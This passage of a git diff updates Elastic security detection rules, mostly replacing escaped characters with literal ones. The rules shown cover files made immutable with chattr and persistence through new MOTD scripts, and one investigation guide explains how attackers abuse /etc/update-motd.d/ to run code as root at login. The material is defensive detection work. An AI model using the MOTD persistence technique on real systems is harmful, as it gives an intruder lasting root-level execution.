EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json index a36bbc8d385..ea508e50fcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json index e7223af21ed..4c2c2278686 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json index b283cc15d9e..71ff37e3bac 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json index 5248ad78939..308ca7cbbf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "File made Immutable by Chattr", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.name == \"root\" and\n process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and\n not process.parent.executable: (\"/lib/systemd/systemd\", \"/usr/local/uems_agent/bin/*\", \"/usr/lib/systemd/systemd\")\n", "related_integrations": [ { @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json index bcbe6f57055..ed2f012c3f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json index 2b3d9f77e8d..7294a4579fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json index 5fcf5beb629..98c44d49b65 100644 --- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json index d2fbfe43420..7e864e2c5da 100644 --- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json index b68a64e70b3..8547fa6339e 100644 --- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json index accfb095ab4..ca5cac6ea2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json +++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json index 6e4caf14d84..06535e7dd4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json index cfaeee7c620..e88ed996f59 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json index fdaebd62c92..3a2cfa2206f 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 